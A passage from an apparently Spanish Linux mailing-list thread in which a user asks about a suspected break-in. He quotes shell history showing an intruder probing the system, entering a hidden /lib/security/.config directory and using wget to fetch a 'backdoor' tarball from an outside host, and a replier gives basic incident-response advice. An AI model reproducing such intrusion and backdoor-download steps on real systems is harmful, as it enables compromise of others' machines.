==> nada de fecha 18 de febrero en el syslog. Luego hice un history y me ==> aparecio esto que por su puesto yo no lo hice(m�s raro aun): ==> ==> 484 cat /etc/issue ==> 485 ps ==> 486 bash ==> 487 /usr/sbin:/sbin:/usr/bin:/bin:/lib/security/.config/bin ==> 488 netstat -a ==> 489 cd /lib/security/.config/bin ==> 490 cd /lib/security/.config ==> 491 dir ==> 492 cd ssh ==> 493 dir ==> 494 cd .. ==> 495 wget http://www.gwydiondylan.org/downloads/binaries/linux/x86 496 ==> /tar/gwydion-dylan-2.3.10-x86-linux.tar.gz ==> 497 wget ==> http://www.gwydiondylan.org/downloads/binaries/linux/x86/tar/gwydion-dylan-2.3.10-x86-linux.tar.gz ==> 498 wget geocities.com/s3rjiu/backdoor/ser.tar.gz ==> ==> Esto paquete porsuesto no los baje.
Parece que se han colado en tu ordenador y se han bajado un backdoor de esos (y no ha borrado el historial, animalito). Pues yo me ir�a para empezar a la pagina de la que se ha bajado el backdoor, para ver que es lo que hace, y conectate a internet lo menos posible, y pon un firewall que bloquee practicamente todo menos lo necesario. Mira los servicios abiertos a internet y el kernel, a ver que vulnerabilidades tienen. Tambi�n te puedes bajar el manual an�lisis forense en linux o algo as� que esta en es.tldp.org. Y si quieres una lista mejorcita pues apuntate a la lista hackindex (busca en google la web). ==> ==> Ah hago un ps y no sale nada, me dice esto: ==> Violaci�n de segmento Vaya, eso igual lo ha echo el troyano. No soy ning�n experto, asi que no puedo ayudar m�s, saludos. ==> Cual es la inseguridad que tengo? ==> ==> Gracias y saludos...... ==> ==> -- ==> Federico Contreras ==> T.S.U. en Inform�tica ==> U.D.O. ==> -- "No hay nada peor que ser vulgar" [EMAIL PROTECTED]
